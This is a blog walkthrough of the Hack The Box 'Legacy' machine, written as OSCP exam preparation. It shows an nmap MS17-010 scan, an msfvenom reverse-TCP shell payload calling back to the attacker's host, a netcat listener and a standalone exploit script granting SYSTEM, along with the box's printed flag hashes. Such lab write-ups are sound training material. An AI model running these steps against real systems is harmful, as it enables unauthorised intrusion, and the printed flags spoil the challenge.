My PWK lab access has ended, but I haven't stopped preparing for the upcoming OSCP examination. I've been practicing on the HTB labs to sharpen my skills, and working on writing buffer overflow exploits so that I'm more comfortable with the process. I hope to write more tutorials once I've finished my OSCP journey, but for now I'm focusing primarily on studying.

That doesn't mean I'm going to leave you all high and dry, though. Nope! Today I'm posting my walkthrough of the HTB machine called “Legacy.”

Enumeration

Scans revealed ports 139 and 445 open, and a quick nmap script scan reveals that the host is vulnerable to a Remote Code Execution (RCE) vulnerability:

root@haxys:/htb# nmap -sT -p 139,445 -PN --script smb-vuln-ms17-010 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 14:12 EDT
Nmap scan report for 10.10.10.4
Host is up (0.067s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds

Exploitation

I discovered a blog post that directed me to a script (from this GitHub repo) which exploits the MS17-010 vulnerability without relying on Metasploit. I downloaded the script and saved it as send_and_execute.py. I also downloaded a required library and saved it as mysmb.py, in the same directory.

The exploit works much like its name implies: it sends an executable file to the target, then tells the target to run the file as the System user. I would need to create a payload to send to the target.

Using msfvenom, I crafted a reverse-TCP payload:

root@haxys:~/htb# msfvenom -p windows/shell_reverse_tcp -f exe -a x86 \
>                          --platform windows -o payload.exe LPORT=443 \
>                          LHOST=10.10.14.22 EXITFUNC=thread
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe

With preparations complete, I started a netcat listener on port 443, then ran the exploit:

root@haxys:~/htb# python send_and_execute.py 10.10.10.4 payload.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81e16da8
SESSION: 0xe1b25310
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1bc3278
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1bc3318
overwriting token UserAndGroups
Sending file XX2NUF.exe...
Opening SVCManager on 10.10.10.4.....
Creating service xFDj.....
Starting service xFDj.....
The NETBIOS connection with the remote host timed out.
Removing service xFDj.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

Returning to netcat, I had a shell. However, I couldn't confirm that I was logged in as System:

root@haxys:~/htb# nc -vnlp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.4] 1030
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>echo %username%
echo %username%
%username%

I used the send_and_execute.py script a second time, sending over the whoami.exe program found in the /usr/share/windows-binaries/ directory of Kali:

root@haxys:~/htb# python send_and_execute.py 10.10.10.4 /usr/share/windows-binaries/whoami.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
  <...>
Sending file CYVONX.exe...
  <...>
Done

The file was uploaded as CYVONX.exe and stored in the C: root directory. The program informed me that I was running as NT AUTHORITY\SYSTEM:

C:\WINDOWS\system32>cd C:\
cd C:\

C:\>CYVONX.exe
CYVONX.exe
NT AUTHORITY\SYSTEM

From there, it was a simple matter to obtain the user and root flags:

C:\>cd "C:\Documents and Settings\john\Desktop"
cd "C:\Documents and Settings\john\Desktop"

C:\Documents and Settings\john\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.10.10.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.10.10.2

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\Documents and Settings\john\Desktop>cd ..\..\Administrator\Desktop
cd ..\..\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713

Conclusions

This is probably the easiest box on HTB. MS17-010 is a well-known, widely-publicized vulnerability with weaponized exploits built into Kali. However, it seems that most people prefer to use Metasploit to exploit the vulnerability. Learning how to exploit the system without Metasploit was a handy and useful lesson. In fact, when I was first exploring this vulnerability, I found one system that nmap reported as vulnerable, but which Metasploit couldn't crack. By using the manual exploit, I was able to gain access to the machine and capture the flags.

This is why I always look for manual exploits. If you use Metasploit for everything, then all you're doing is learning how to use Metasploit. But if you seek out manual exploitation methods, you learn more about how the vulnerabilities and exploits work. That way, when Metasploit fails you, you're not totally lost.